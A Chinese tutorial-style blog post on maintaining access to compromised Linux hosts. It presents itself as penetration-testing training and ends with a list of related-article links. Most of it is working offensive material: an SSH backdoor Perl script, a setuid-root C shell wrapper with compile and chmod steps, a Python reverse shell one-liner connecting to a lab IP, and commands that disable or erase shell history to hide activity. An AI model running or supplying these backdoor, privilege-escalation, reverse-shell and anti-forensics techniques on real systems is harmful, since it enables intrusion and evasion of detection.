Linux权限维持

文章目录

  • Linux权限维持
  • 前言
  • ssh后门
  • Setuid and Setgid
  • Linux隐藏技术
  • 后记

前言

前面讲解了window中的权限维持的方法,本期给大家讲解一下Linux中权限维持的方法,内容比较少,大家还是能掌握尽量都掌握吧,在以后的工作渗透中,也是需要用上的。

ssh后门

过滤
ps -elf |grep 12345

监听端口
nc -lvvp 123

查看端口
netstat -anlp|grep 12345

(1)ssh后门(脚本内容)(192.168.231.134)
#!/usr/bin/perl
exec “bin/sh” if (getpeername(STDIN) =~ /^…4A/);
exec {“/usr/bin/sshd”} “/usr/sbin/sshd”,@ARGV,

开启ssh服务,连接ssh(192.168.231.128)
ssh root@191.168.231.134 -p 12345(无需密码即可登录成功)
实验失败

获得shell后,利用python模块获取虚拟终端
python -c ‘import pty;pty.spawn(“/bin/bash”)’

查看登录的来源
w who last

ip addr 查看ip地址

本次实验,脚本没有执行成功,这里就不演示了。

Setuid and Setgid

(2)Setuid and Setgid(以普通权限获取root权限)
C脚本
#include<unistd.h>
void main(int argc,char *argv[])
{

setuid(0);
setgid(0);
if(argc>1)execl("/bin/sh","sh","-c",grgv[1],NULL);
elseexecl("/bin/sh","sh",NULL);

}
在kali编译脚本并执行


gcc back.c -o back
cp back .bin/
chmod u+s /bin/back
编译脚本并生成back文件,复制到bin目录下,赋予读写的权限


查看权限
ll /bin/back

执行命令
back whoami
back
whoami
root

执行成功,实验结束。

Linux隐藏技术

chatter +i 1.txt(即使是root权限也删除不了)
chatter -i 1.txt 把特殊的权限给删除了

touch 创建
rm -rf 1.txt 删除
ll 123 查看权限
ls -la 查看权限

拿到shell后,开启无痕模式,禁用命令历史记录功能
set +o history
恢复
set -o history

删除历史命令
删除100行疑惑的操作命令
set -i “1000,$d” .bash_history

反弹shell的网站
webshell.github.io/reverse-shell-generator/

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.231.128”,8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,“-i”]);’

\r后门(隐藏前面的内容)
123\r456
cat 1.txt
456
vim 1.txt
123456

后记

Linux权限维持的内容相对来说比较少,因为没有了组和域的概念,也没有了注册表的概念,所以在内网环境中,公司里主要还是以window渗透为主,所以window中的权限维持的方法有很多,大多是写入注册表中,开机自启运行的。

内网渗透-Linux权限维持相关推荐

  1. linux实验总结及心得_安全实验室 | 内网渗透—Linux权限维持技巧总结

    在上一篇文章中我们介绍了内网渗透中Windows环境下进行权限维持(点击阅读)的方式,本期我们将视角集中在Linux系统中继续对内网渗透中的权限维持方式进行探索.Linux也是在内网渗透中很常见的操作 ...

  2. linux下敏感文件(账号密码)查找—内网渗透linux主机密码收集

    目录 find命令 命令格式 按照文件/目录名搜索 linux正则表达式 find同时查找符合多个格式的文件 grep命令 管道符| egrep xargs命令 案例 内网渗透中linux主机查找账号 ...

  3. 内网渗透-Linux内网渗透

    系列文章目录 文章目录 系列文章目录 一.Linux内网渗透 二.提权 2.1 利用内核漏洞进行提权 2.2 利用文件权限配置不当进行提权 2.3 利用SUID程序进行提权 三.隧道 3.1 SSH ...

  4. 内网渗透-window权限维持

    window权限维持 文章目录 window权限维持 前言 meterpreter权限维持 persistence metsvc 系统工具替换后门 iexplore.exe narrator osk ...

  5. 内网渗透系列:内网信息搜集方法小结2

    目录 前言 一.本机信息搜集 1.用户列表 (1)windows用户列表 (2)分析邮件用户 2.进程列表 3.服务列表 4.端口列表 5.补丁列表 6.本机共享 7.本用户习惯分析 8.获取当前用户 ...

  6. CVE-2018-8174漏洞复现及内网渗透攻击

    文章目录 说明 CVE-2018-8174漏洞简介 Persistence后门 环境搭建 拓扑图 Win server 2008 对Windows 7开启1433端口 内网攻击过程 1号机获得2号机的 ...

  7. 红蓝对抗 linux内网渗透

    目录 一.前言 二.提权 2.1 利用内核漏洞进行提权 2.2 利用文件权限配置不当进行提权 2.3 利用SUID程序进行提权 三.隧道 3.1 SSH 3.2 nc/ncat 3.3 portmap ...

  8. 2022-10-15(Linux应急响应、配置漏洞之DNS域传送、内网渗透之内网主机发现技巧)

    http://noahblog.360.cn/advanced-windows-taskscheduler-playbook/@[toc] [重要]拜读的文章链接都在标题上. 一.linux应急响应 ...

  9. 内网渗透之Linux反弹shell(一)

    前言 作者简介:不知名白帽,网络安全学习者. 博客主页:https://blog.csdn.net/m0_63127854?type=blog 内网渗透专栏:https://blog.csdn.net ...

最新文章

  1. Linux常用性能检测命令
  2. Web开发的标准目录结构
  3. eselasticsearch入门_ElasticSearch入门学习-基础示例(1)
  4. oracle needs compile,Oracle:为什么在基础视图中的数据更改后,我的MW无效到NEEDS_COMPILE状态...
  5. div居中与div内容居中,不一样
  6. Android之父卸任意味着什么?
  7. Mac 系统和windows 的差别
  8. hashCode() 和equals() 区别和作用
  9. Mac模拟慢速网络 - Network Link Conditioner 安装和使用
  10. 22/100. Find All Anagrams in a String
  11. 【机器学习】数据挖掘算法——关联规则(一),相关概念,评价指标
  12. java调C接口_java通过jni调用C程序接口
  13. mongdb安装配置
  14. 使用devops的团队_DevOps团队的3种指标仪表板
  15. 2022百度人工智能专利白皮书 附下载
  16. ORCAD原理图检查
  17. CString 使用详解
  18. 服务器上Kafka启动报错:error=‘Cannot allocate memory‘ (errno=12)
  19. python基础操作笔记
  20. MATLAB调用Origin绘图官方案例学习

热门文章

  1. 不要迷恋哥本哈根达斯
  2. 两数之差的补码等于被减数的补码与减数相反数的补码。_二进制的原码、反码、补码...
  3. python爬虫百度安全验证_爬虫黑科技-绕开百度人机验证
  4. java-net-php-python-jsp家具进销存管理系统1计算机毕业设计程序
  5. springboot项目添加了logback-spring.xml配置文件不生效
  6. 坦克对战游戏 AI 设计
  7. Java|Joda-Time简化时间处理利器
  8. 第二证券|小鹏持续萎靡,理想蔚来逆势反弹破月销记录
  9. @Value的诸多用法
  10. UVM实战 卷I学习笔记10——UVM中的寄存器模型(3)